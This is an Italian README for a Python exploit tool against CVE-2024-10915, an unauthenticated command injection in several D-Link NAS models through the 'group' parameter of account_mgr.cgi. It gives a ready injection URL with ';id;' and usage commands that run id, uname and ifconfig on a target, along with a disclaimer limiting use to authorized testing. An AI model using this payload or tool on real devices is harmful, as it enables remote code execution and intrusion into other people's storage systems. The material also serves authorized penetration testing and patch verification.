
Questo exploit basato su Python prende di mira una vulnerabilità di command injection in diversi prodotti NAS D-Link tramite l'endpoint /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. La vulnerabilità consente ad attaccanti non autenticati di eseguire comandi di sistema arbitrari sul dispositivo interessato.
CVE-2024-10915 colpisce diversi modelli di NAS D-Link. Un attaccante può iniettare comandi tramite il parametro group nel comando cgi_user_add, portando all'esecuzione remota di codice.
D-Link DNS-320
D-Link DNS-320LW
D-Link DNS-325
D-Link DNS-340L
Vulnerable Endpoint: /cgi-bin/account_mgr.cgi?cmd=cgi_user_add
http://192.168.1.100/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=';id;'
Python 3.x
libreria requests
Installa le dipendenze richieste:
pip3 install requests
usage: dlink_nas_rce_cve_2024_10915.py [-h] [-u URL] [-c COMMAND] [-p PROXY] [-o OUTPUT] [-l]
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "id" -p "http://127.0.0.1:8080" -o results.txt
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "uname" -p "http://127.0.0.1:8080" -o results.txt
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "ifconfig" -p "http://127.0.0.1:8080" -o results.txt
Questo progetto è destinato esclusivamente a scopo educativo e a test autorizzati. Non utilizzare questo strumento su reti o sistemi per i quali non disponi di esplicita autorizzazione. Gli autori non si assumono alcuna responsabilità per un uso improprio o per eventuali danni causati.
| Opzione | Descrizione |
|---|
-u / --url | URL di base del target (es. http://192.168.1.100) |
-c / --command | Comando da eseguire sul dispositivo (predefinito: id) |
-p / --proxy | Usa un proxy HTTP (es. http://127.0.0.1:8080) |
-o / --output | Salva la risposta HTTP in un file |
-l / --list | Elenca i prodotti NAS D-Link interessati |